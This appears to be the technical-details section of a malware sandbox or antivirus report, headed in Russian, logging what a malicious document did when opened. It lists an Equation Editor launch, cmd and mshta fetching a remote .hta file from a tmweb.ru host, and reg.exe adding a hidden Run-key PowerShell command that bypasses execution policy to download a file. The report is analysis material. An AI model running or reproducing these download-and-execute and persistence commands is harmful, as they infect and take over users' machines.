Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'TQURHX' = 'powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cn23428.tmweb...
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/av17.hta
- http://cn####8.tmweb.ru/av17.hta
- DNS ASK cn####8.tmweb.ru
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/av17.hta' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TQURHX /t REG_SZ /d "powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://c...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\mshta.exe' http://cn####8.tmweb.ru/av17.hta
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TQURHX /t REG_SZ /d "powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://c...